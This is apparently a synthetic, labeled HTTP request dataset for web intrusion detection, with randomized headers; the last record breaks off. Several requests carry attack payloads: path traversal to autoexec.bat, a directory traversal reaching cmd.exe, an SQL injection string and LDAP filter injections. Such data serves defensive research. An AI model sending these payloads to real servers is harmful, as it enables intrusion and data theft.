X-Serial-Number: 1881707
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29080
Start - Id: 12525
class: Valid
GET /QLQhavingiZqHN0d8o/uh2/AfSS5ZuG2Y6b63/99GnkkN9qx8/execOtkLeQ.bTQ7/teUIS-/4RC7h/hx1hbcato4aeloa/sC/0Eke1TsRedm5jaK0eay2/iGN1@X4U/hnaEblc9dee.aspx?mIdowDst6il=7677682355&orttrhlnay=su&7YcNtPxp_@-n5=bug&iaryeso=3d77asfqh0nzlis&eYiadst1no=2&onarogeeue0=go&OrBh0RylhGy.=h6U&4hJfstylecp5vN=%2Fco&aisaYbmh=13108&il0zl1tzae=rhrna&weniokcomo=%28etrtmt+nsystemn%5Cehro8a%7C&ogvo8yeueoeui=i%7Ed%5C HTTP/1.0
Host: 25.157.117.87
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 202.79.22.213
Cookie: toUr== rec6)admin t 1dr;oiiqykiIbrmo=);don9adc0mep=qsavS;hebgtth=oatdmrGvoelbje;bUscioep7ayl9t5=nWL33gF-oqdu
Cookie2: $Version="442"
Date: Tue, 14 Jul 09 05:11:45 CET
ETag: "m4eQszZou@PvJ.9Qy3gq"
Expect: SmatEery
From: sEao@syhnkioup.de
If-Modified-Since: Sun, 23 Oct 05 13:47:23 GMT
If-Unmodified-Since: Thu, 04 Mar 10 22:13:13 UTC
If-Match: "SqPwJyTZUVSMBoI"
If-None-Match: "1fm2wyr0XxaqHLzt"
If-Range: *
Max-Forwards: 450
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: taeot 3ovn=rfarL
Authorization: dkmt5 agEpnhR=sHdssmy
Range: 79521-822865,4-
Referer: /3s5uz0x/y3sn.cgi
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: eeutYte/8.5
UA-CPU: Sparc
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 580x349
Via: howNwa/2.0 92.229.195.28, HTTP/0.7 www.mfgr8Jto.html
Transfer-Encoding: compress
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 44.18.78.71
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12525
Start - Id: 45687
class: PathTransversal
GET /1tEenao7ysptnee/xrIkw.OnGApVS.mspx?rs0Nog=utoczuaz0nu&a4grb74ud=%5Cautoexec.bat&50nrerteiiwl=199209251 HTTP/1.0
Host: www.uOiHnes3Yr.ch
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Pt-eyvuje;q=0.2, h6e-rtn6ar4;q=0.9, toryeIn-fns, sT8snFN-osi
Cache-Control: no-store
Client-ip: 10.24.0.201
Cookie: tv=8l;selectorNF8=C6n;UJU4G9EuW5H=osrcninnn;dmy7ag5Xuo5tejP=78395511
Cookie2: $Version="55"
Date: Tue, 04 May 04 07:50:24 GMT
ETag: "te5LXUt5O3OOLfUO"
Expect: to4thr
From: esIpsioy@eehlxsang.it
If-Modified-Since: Fri, 16 Sep 05 12:06:39 UTC
If-Unmodified-Since: Tue, 18 Jul 06 02:20:19 CET
If-Match: "OdEyfn9cObmoLLWhM3A"
If-None-Match: *
If-Range: Sat, 17 Nov 07 16:02:42 UTC
Max-Forwards: 6194
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: http://www.mvpiiaeR.it/tgemaLf/eelnpysc/Hgay5eoa.cfm
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; Solaris 7.6; le-oE; rv:3.9.6) Gecko/05889063
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 488x430
Via: FTP/1.0 98.252.135.141:259
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45687
Start - Id: 41669
class: SqlInjection
GET /iosrMnOhavingGnullvFXe/yeacfKcrs/tMkM@wQA/sOtrqrs2jgnpetwota/teUb/g3AC-LquxKHCr8p.nsf?ax=83643454&snmoZoosIts=%27select+customer_phone++++%27%7C%7C%27from+customers+%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C++lv_surname%7C%7C%27%27%27++and+++customer_type%3D1%27%3B&er7=47&nmAi=e%26+ti HTTP/1.0
Host: www.nxen.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity
Accept-Language: tiheo-dnr, tRar-pR2tne0;q=0.3
Cache-Control: no-transform
Client-ip: 239.57.78.114
Cookie: hptS3hHrao=hlthaccess_logEulandm;dlaneritanped=3068105;ahntl=4I4DVC;p9l4hAv=165;PacI=1970
Cookie2: $Version="5"
Date: Sun, 14 May 06 22:24:22 UTC
ETag: "9etS4jTU1lIUOtjyf_"
Expect: 7huauig
From: maohii@yrratfrp.uk
If-Modified-Since: Fri, 11 Jun 04 13:21:13 GMT
If-Unmodified-Since: Mon, 23 Nov 09 09:06:15 GMT
If-Match: "GM1ZN0-VEzVX0@O7hz"
If-None-Match: "iq7M18atiEy_-Mx"
If-Range: "_GAzh@j7to8Lv3f9"
Max-Forwards: 2266
MIME-Version: 4.1
Pragma: rlitR9S=noasnay
Proxy-Authorization: daahrP decdjt5=wri6iree
Authorization: Digest username="tiwoSh"
Range: -91,787-299778
Referer: http://rufb4ks.st/etmt5/snpagro/sHso.dll
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.4 (Windows; U; Windows NT 1.2; en-as; rv:4.1.8) Gecko/77947969
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: 5.6 173.151.3.170, 5.1 41.226.234.152
Transfer-Encoding: compress
Upgrade: i2e/5.2, E6w/3.7, mge/6.8
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41669
Start - Id: 20629
class: Valid
GET /StianNaeaindaoeqtAa/iinte7tsdaprh/elenstochaeofeenn/mmocha5H/tA/azq/i.CuTSFg_/e_AIb/t5OVKjH/wh/sVYYlv6gExh/Z5.php?cErhzrNchas=gst&dvtEgcml3iodbt=s3.n-&2fOASA-RL=cud%29ecmdEtEhhaving HTTP/1.0
Host: www.tmdihs.cz
Connection: ootiai9t
Accept: text/*, application/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Hk1r8rg-0Er, of-ct2v
Cache-Control: no-transform
Client-ip: 242.209.113.208
Cookie: autoexecsor1Z=177;rdade=in]iEateq=nN$c t;ismnlNhunb6yae=HteH;cir7sFtjnnlfhu=~i[escripth5[ mni;shsereiYylaKn=dhn
Cookie2: $Version="808"
Date: Fri, 31 Jul 09 23:58:04 CET
ETag: "SmAzF.gyYce_XQcLq"
Expect: 100-continue
From: 6fkd@u3ghin.st
If-Modified-Since: Tue, 17 Feb 04 04:03:01 UTC
If-Unmodified-Since: Sat, 01 Sep 07 12:18:18 GMT
If-Match: "8zEZiswhZfe1X4MT"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Basic dWFuZWkyeGk6c2FudGo=
Range: -25838,-884476
Referer: http://www.slitelee.de/ScRl/s7Mittd/tqja/lspuefl/3iuriey.gif
TE: chunked
Trailer: Date
User-Agent: deojeeoatw/0.7
UA-CPU: 68000
UA-Disp: 491,773,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3710x9582
Via: 1.9 www.trir10cu.jpg, FTP/9.6 68.29.93.65
Transfer-Encoding: gzip
Upgrade: doTsa/2.7, brr8a/3.0
Warning: 146 111.229.123.201:35 "bbrhnev4atnhijdy" "Sat, 11 Dec 04 20:32:24 GMT"
X-Forwarded-For: 240.52.92.34
X-Serial-Number: 999844116491308
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20629
Start - Id: 25434
class: Valid
GET /JQ8Gx6MfVk-E/rbatecSfiCwumgt1sns/hre6@CNHzkuaS/jL/sa1rmEbri0xo7rse/sRJ1ud0b/nG1diMmd3/.05TrmuMdahd_..pl?Unq1thbaehfadB=ntcIg&idaoeea2ta=r_W09At9K6E&3Wtedfr47rs=20889957&uoeTSHx=670136&soitaAiQutn=7kS&zadminBXacceptJzMXXXV=0239992&anhtan5ta=1529&davm=ii7nodeePo&indi5mnmysara0=rsnNiiriuwNwr9s&otnolhsc=02&iframeDzOiM=tmpyWbody%5C&_2N3Gs9u3positionP=nd%7Cxegoik0xeckN&dIemds1ti=d&yaPcmadsnN=p1ABQId15&oaeeno=969 HTTP/1.1
Host: www.dneb.fr
Connection: keep-alive
Accept: video/*;q=0.2, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-ol, rejma5ma-tdO6wsyi, r-mEentri
Cache-Control: t=DanEaHja
Client-ip: 82.74.210.10
Cookie: taA2yn=elali1eugmi;KncmetaIqnei18G=43519;3sHE=05882;KWYyyaccepto=866270494;hlsmF5opendZ8rcpu=e aKwe;eiT=3333042
Cookie2: $Version="634"
Date: Wed, 28 May 08 13:59:00 GMT
ETag: W/"BGZ-kxh1H2VBfeS"
Expect: keo3Em
From: ledpneia@lcpqUt.de
If-Modified-Since: Thu, 30 Apr 09 05:04:14 CET
If-Unmodified-Since: Sat, 12 May 07 07:50:37 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Jul 07 03:57:13 GMT
Max-Forwards: 83
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dHJVZTI6UEdseWxjN2U=
Authorization: Basic ZW93ZTphMWsyd3Rk
Range: -7599
Referer: http://www.Wrz9iR.de/e5s1/ndfad/laic9bHo.nsf
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.6 (compatible; Konqueror/4.1; SunOS sun4u; iree98; bi0ji6w5h; CoIe)
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: HTTP/6.3 216.199.213.198
Transfer-Encoding: deflate
Upgrade: roti/6.6, neeqsd/9.8, ycfke/5.8, l52ps/7.9, Ahg/7.6
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25434
Start - Id: 9934
class: Valid
GET /t4sRc/rOG_DY1X4-gSQ2v2eTy/lQPJXzt/ehteA3i2ay5omeoti/OtelnetOS5sZ2mJYFI97/teibafUdett/aJ@JqhP1bFl/y0y_h4jmHuZ_rt./mll-87tpwba.htm?qabyTe=%5D0dutt5taupdateZ&66vheg=7hrrg&atalnrhlot=uree2te&bvreern=thbr&w3sluympgd=+nhsjpuupdatercpI&eeohntaYhpu=sy&y9Dns=stt%3Ftr%7CSIedeh&oapt=083131477&iTerhdhhfooreha=vp9hUe HTTP/1.1
Host: www.jlelhhew.org
Connection: close
Accept: text/*;q=0.6, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=12175
Client-ip: 105.44.31.85
Cookie: eo=hytuqpbeen7a;b3DnqsobjectE=teobo agroup by|slr6;xmlDX0dWj1=13;msung=$ud GgodwOftcynnve3;ij6a0=sPm;mw=zs\en'eOnull[vbscripterL;
Cookie2: $Version="052"
Date: Tue, 08 Jun 04 21:33:41 GMT
ETag: W/"uhU3MkLbqMsAWA6eq"
Expect: 100-continue
From: hoyaen@w8anmIEhtt.org
If-Modified-Since: Thu, 30 Sep 04 22:10:57 CET
If-Unmodified-Since: Tue, 27 Mar 07 04:48:10 UTC
If-Match: "Q@Oej8dLxcCw3OIRAQaR"
If-None-Match: *
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 98
MIME-Version: 6.9
Pragma: w=st7a
Proxy-Authorization: Digest realm
Authorization: Basic VHFsUmNiOm9haHJ1ZQ==
Range: -911
Referer: /hct2a7.asmx
TE: trailers,chunked;q=0.5,deflate
Trailer: Range
User-Agent: Mozilla/8.0 (Windows; U; WinNT 0.3; rt-ty; rv:1.3.9) Gecko/05791933
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9878x2759
Via: iwenro/0.4 41.78.30.23, HTTP/0.6 www.fh7eHtey.css, 0.6 29.113.213.139:4
Transfer-Encoding: compress
Upgrade: auldc/3.6, reoo/4.9
Warning: 097 www.eslmAdc.js "1aItavs" 
X-Forwarded-For: 133.212.108.145
X-Serial-Number: 443764018144231043
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9934
Start - Id: 3485
class: Valid
GET /Wi/zk/nGLt8@aTnL/584vieOfR--U/MX1nsIA@t/i2mK2hNcU/i._Mye6UxAXpoJE/eceieUneacWshx.msf? HTTP/1.0
Host: www.yx1N.cz
Connection: sfhs0ma
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity, deflate
Accept-Language: adecwedi-ubl;q=0.1, grpr8o-iec8a;q=0.4
Cache-Control: max-stale
Client-ip: 44.246.36.93
Cookie: i8niee=eycnls\ 6c;ngos=raar;A0m5teilnmu=156179;ilosute=tie
Cookie2: $Version="75"
Date: Sat, 30 Jun 07 14:27:45 UTC
ETag: W/"aDJFGw43VFZupg29LI"
Expect: 100-continue
From: peuneie@adoc.be
If-Modified-Since: Mon, 11 Sep 06 08:24:58 UTC
If-Unmodified-Since: Mon, 23 Feb 04 22:25:43 CET
If-Match: *
If-None-Match: "cvwnUDsV9S2TgQV"
If-Range: *
Max-Forwards: 260
MIME-Version: 6.5
Pragma: pSUt='lntOi1On'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=auth-int
Range: 2754-,-42,333635-
Referer: http://eliHiaXs.com/pahino/p9oM/kmfeteuR/sinjpmno.js
TE: trailers,deflate;q=0.0
Trailer: User-Agent
User-Agent: uxRW6tZ http://www.oesetem.gov
UA-CPU: x86
UA-Disp: 7333,3930,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8177x498
Via: 8.8 77.159.247.227
Transfer-Encoding: deflate
Upgrade: inonY/0.4, ntioh9/5.8, s5ir/5.7, hell/8.4, daseo/5.5
Warning: 330 47.121.195.196 "o9daseccs5doattoiw" "Sat, 18 Oct 08 15:22:02 CET"
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 6688581
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3485
Start - Id: 43983
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.znayw.gov
Connection: eti6
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.1, identity, compress;q=0.3
Accept-Language: shivh-ai;q=0.2, roqs3Ueg-wntdnru;q=0.1
Cache-Control: no-store
Client-ip: 60.172.21.158
Cookie: lRtftdiaos=l5ldropt;nattts=e/;V9ftpNpassthruBnull=~ p;RnSq1e8e=e3y0e5ai
Cookie2: $Version="719"
Date: Sun, 23 Jul 06 07:49:32 UTC
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: *
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest opaque="rpcs"
Range: -2,795-,-91
Referer: /rbf0/toLdo/RtWncdro/btlhasU/y6eb.asp
TE: trailers
Trailer: Referer
User-Agent: 0qg6aei (eiwnGpxgx)
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: FTP/3.1 www.gc620Um.tiff, ejia/9.3 68.147.38.229
Transfer-Encoding: identity
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43983
Start - Id: 38234
class: LdapInjection
GET /0vB/mk9ZU/chd_/oesfubrixi/n4P/NtLin@q3/indrt4egrtEjnteN/8mTiojnitmostarRa8/ki-SyperlQSRaFBC/eohoftLdmg7aEyl4.tiff?irn=bnbperl+%24iobhjlike&ge97dlinnejuWb0=he%3Ca78%3Fo3&npeeyhHien3rsm=naeei&elssotfl7ioidf=n%40MRKOR&4sxR=89%29%28%26%28objectClass%3Dmwg%29%28%7C%28sn+++%3D+++iq8x%29%28cn%3DeSm5++J*%29%29&SrmhouM=7&9mqn=xw+u9%28tnt%3AyxeOtwinntlot%3E&nnetpAzdRpnt=tws2n9ar%2BrhP HTTP/1.1
Host: www.ne6wn.net
Connection: owocph
Accept: */*
Accept-Charset: windows-874, cp-932, koi8, iso-8859-8
Accept-Encoding: *;q=0.9
Accept-Language: gtesle-wrcn
Cache-Control: max-stale=42434
Client-ip: 243.207.220.22
Cookie: Gdgs3e-r-=DuCltaPasca;eYtoep9csHiE=oi6q
Cookie2: $Version="541"
Date: Wed, 04 Nov 09 16:14:05 CET
ETag: W/"pNPv_Emey7cK.eo-"
Expect: iihy=ctahwb5
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Mon, 03 Dec 07 13:01:25 GMT
If-Unmodified-Since: Sat, 20 Sep 08 22:12:58 UTC
If-Match: "3nsYqJH_6IwPY.6A"
If-None-Match: "mNBe@xPBirAXBjwl"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.4
Pragma: eertnoe=iur
Proxy-Authorization: NTLM dGJyYmVzYTJmYWlveUhzNzdyaGJkdzVpbGF0WnRpV256ZmFzdGxtZA==
Authorization: Digest response="7228C9B3bAD3ED01ffc7bEA9B4f6CEfd"
Range: -9629,18880-,-775909
Referer: http://IAdh.com/ipad/qduc/5tcvebh.css
TE: trailers,deflate
Trailer: Connection
User-Agent: a@.RFP2H http://www.yzia6mda.com
UA-CPU: StrongARM
UA-Disp: 296,8945,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: HTTP/4.7 www.ncgnltyE.html
Transfer-Encoding: aoeo8
Upgrade: gcslf/0.5, byhs/2.3, tt7d/1.7
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38234
Start - Id: 38492
class: LdapInjection
GET /IRgCS@/ntesfdIgBlunt/ega4ebupi.nsf?b404FZTUX=3&bgsoundhwIGi_8B2=tEo%3Bmaownh&q9xaf0entetf5cr=1875&r5fyEe2rnu=%29+++%28%7C++++%28raB%3Dil*%29&gW4supdateDr31dv=ee&mnpseaqoM7n=ab&eha=589&bahtAnOOrs=29438&NBVskVwOJo=9016&tNee=gjrNJ6KbLBv4&er5ier1reawn=wP%40x0AM&d6Hreteg=e+e%3F%5Dtzqyd&.7lusr9I8LC_G=ta%3CtinputeerbNuxmliv&rHqOtesj=310&3t2te1d9Y5he8Sl=lvs6NrWjKh HTTP/1.1
Host: 198.9.161.3:80
Connection: keep-alive
Accept: application/rtf, image/*;q=0.4, audio/*;q=0.4
Accept-Charset: windows-1258;q=0.2, iso-8859-4;q=0.4
Accept-Encoding: deflate, identity;q=0.3
Accept-Language: r9sdesl-jpo;q=0.3, wnq-dnlh, tnP-Gyb;q=0.6
Cache-Control: min-fresh=34
Client-ip: 233.33.102.205
Cookie: eicseai=9;yN-K=oQFQOIa.;9uJTxIIih=ial;otTYenfbegwrh=nvther9o tymh;epXrc=vZe9r;CCUS=p@Jvr_.TkXX
Cookie2: $Version="1"
Date: Mon, 11 Sep 06 15:39:53 GMT
ETag: W/"ey0oseul4ln@JDqZ7P"
Expect: rae1
From: yowh@sjoa6l6daa.gov
If-Modified-Since: Mon, 22 Nov 04 03:38:11 GMT
If-Unmodified-Since: Mon, 24 Jul 06 14:24:06 UTC
If-Match: *
If-None-Match: *
If-Range: "oOG0PaTS91Ed73nx"
Max-Forwards: 4
MIME-Version: 3.3
Pragma: n=Oeif
Proxy-Authorization: Digest nonce
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: -61
Referer: http://3dAgMep3.st/4gYrr/shamh/o3enattr/asecae.php4
TE: chunked;q=0.7,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.3 (X11; U; Open BSD i586 1.0; ht-fp; rv:9.8.5) Gecko/81727812
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 185x781
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 748 218.206.210.84 "59neemNylty8eilereeP" "Tue, 26 Feb 08 18:29:12 UTC"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38492
Start - Id: 27889
class: Valid
GET /nnseFsgtriesNe21/EmvjusrwACV1vVOD/u0gonooelur5ci/s17fxsnijfDocta/0r_RRvfXl@eU2LJ/cdte9slhhc7eeTeBEdda/vNQ7feChKK8P4b6I.gif?oDhO=42&uetk4mtdrschr=06&o3fclWmFH=stdine&oattifpki87r=3154684499&havingZRTVz5VsG=6Uo&yayhLtasirtqtbf=d1ioS0aW&X..RJT-vimgO=7L&LnfaRneibsE1ea=acld+mtlNeSn HTTP/1.0
Host: www.rElbsh.be
Connection: keep-alive
Accept: image/gif
Accept-Charset: macintosh, x-mac-roman;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: hven3s='weucnwa'
Client-ip: 218.21.80.173
Cookie: zzmee1Ae=g3al84rDg7;4sh4eEgr6mt=90zd
Cookie2: $Version="56"
Date: Fri, 15 Dec 06 02:30:27 UTC
ETag: "3bi8TVg5_pidMUIy"
Expect: irefgwes=anxS
From: naOe@fsh5cXZ.uk
If-Modified-Since: Sun, 23 Dec 07 20:57:02 CET
If-Unmodified-Since: Sat, 01 Nov 08 14:36:32 CET
If-Match: *
If-None-Match: "x2V5X11rCsYQZ-ATg"
If-Range: Sat, 28 Oct 06 23:25:01 GMT
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic N2E5VW9lOmJvZWFu
Authorization: nmsis apcs=bees5
Range: 6-04307,08-
Referer: /zoteo/dkZcspS.msf
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: enetA/4.6.2.5.4
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 869x220
Via: HTTP/6.0 www.yoUPe4i.shtml
Transfer-Encoding: gzip
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27889
Start - Id: 7255
class: Valid
PUT /sV/ddok6Stt5Leiiuee/39nk/eN/llnatw9patshsiHn/ZKTCkP5L/ltseeheyfawirH8sEe/5tP6D-HT.gif? HTTP/1.1
Content-Length: 18
Content-Language: tee9awll,bnd2rh
Content-Encoding: compress
Content-Location: /aeesa6/1Aim.wmn
Content-MD5: ZHo0ZjlldWVleGVvdGh0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Oct 07 07:07:44 UTC
Last-Modified: Wed, 03 Jan 07 15:23:52 CET
Host: www.gieu.com
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-1258, windows-1252
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 158.43.175.204
Cookie: atyc0en9sl=223;r-BDeAa=a (u
Cookie2: $Version="9"
Date: Mon, 08 Mar 04 21:28:22 UTC
ETag: W/"peUbjB681TZ3ZHuUU"
Expect: trene=ontocto
From: tsrazhte@n9aeeuk.be
If-Modified-Since: Mon, 12 Jul 04 04:18:16 GMT
If-Unmodified-Since: Wed, 10 Mar 10 08:40:34 CET
If-Match: "sjB7NcwugEUzGY6lklK"
If-None-Match: "M7bBSgUZsrnBEfjE"
If-Range: *
Max-Forwards: 59
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ntsAjG eRoonit=huowas9
Authorization: w6toe hm3s=yFos
Range: -805
Referer: http://aCdrETvn.de/j5ahvx/biQneud/Yjmpe/6jsPAo/uzigMr.cgi
TE: trailers
Trailer: Upgrade
User-Agent: uh8ttebmhJ/9.7.3
UA-CPU: StrongARM
UA-Disp: 6402,121,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 9.5 139.26.160.177:6
Transfer-Encoding: compress
Upgrade: Ees/2.1, pahtc/8.0, el0rd/3.8, bnNs/0.8
Warning: 038 www.lr6tO.html "rmcnauss8" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: --------------
~~~~~: ~~~~~~~~~~~

coetu=dudTsEIYxais

End - Id: 7255
Start - Id: 15577
class: Valid
GET /i3LN3-7eLGm/tC7iNKi/qtzOykSyDKnR/uoSd/a1j.jsp?ji8mit0scg4e=5&Tusr8etl6ARAusrW=11701&ewuap=34gobjectbetween&mmulOhowCas5dr=%25h&nro=87gXjSigh&zdeumesq=mecb5ue+t&aseenieErgolpeH=gh%26A%26%25rstdinAIsoaZhs&oge3hxpme5=888882310 HTTP/1.0
Host: 98.250.240.241:6587
Connection: close
Accept: */*;q=0.2
Accept-Charset: shift_jis;q=0.4, iso-8859-1, euc-cn
Accept-Encoding: deflate, gzip;q=0.3, gzip;q=0.3, gzip;q=0.6
Accept-Language: n8Etarea-FSt, wjrnfn-hs3nEvim;q=0.8, nrbiho-y9aTsw;q=0.5, o-riVs, hnoseo-d;q=0.4
Cache-Control: no-cache
Client-ip: 243.119.45.229
Cookie: TSswhereJM576Uh=rjz4Ms
Cookie2: $Version="6"
Date: Sun, 15 Apr 07 03:09:32 GMT
ETag: "mNbVp5ZBEarBgcSmY"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Sat, 17 Jul 04 19:05:46 GMT
If-Unmodified-Since: Fri, 15 Oct 04 03:36:01 CET
If-Match: *
If-None-Match: "FCyfKK3-Hxz90h796"
If-Range: Tue, 21 Sep 04 11:02:48 GMT
Max-Forwards: 723
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest cnonce="eeahe"
Range: 58-,2-
Referer: http://www.yczny.cz/o6Tsbm/eiDe/aidepseo.dll
TE: gzip;q=0.2
Trailer: Via
User-Agent: w5yX8qs http://www.ti5Noi6o.org
UA-CPU: StrongARM
UA-Disp: 213,6888,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 817x4367
Via: 3.0 0.74.233.174
Transfer-Encoding: compress
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 737 123.135.15.139 "27acrahrs" 
X-Forwarded-For: 70.192.139.43
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15577
Start - Id: 16336
class: Valid
GET /l-9dKjbXWp/dE438EpoN/it/E4rMu/hlU/y@z/mC/mdet76atedgm/uSi6l/sc.php3?EIsNNiesNkeoy=29429964&c6=relocationne%7EqidsBpE&jeOb=%25pn+euomDesu&Fo0QNM6CUWI=5Ja+&paxgspi9e9eo4a=e6ktat%7E3tl&eTa9p=4&ndAsbepeeEg=n%40%24nmhsaaR HTTP/1.0
Host: www.ocha.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.2, x-mac-arabic;q=0.6, x-mac-hebrew;q=0.2
Accept-Encoding: compress, identity, identity
Accept-Language: m7tcul4-esespbea, adaiie8-etbcN, nhwtni-es, Gbedrn9-leL3ee;q=0.8
Cache-Control: min-fresh=46458
Client-ip: 33.226.87.182
Cookie: ninernsN=ittph;9lduaEa=loHalei)ei0
Cookie2: $Version="0"
Date: Tue, 11 May 04 14:17:11 GMT
ETag: W/"nei2ii_j05HS_d4UlsD"
Expect: 100-continue
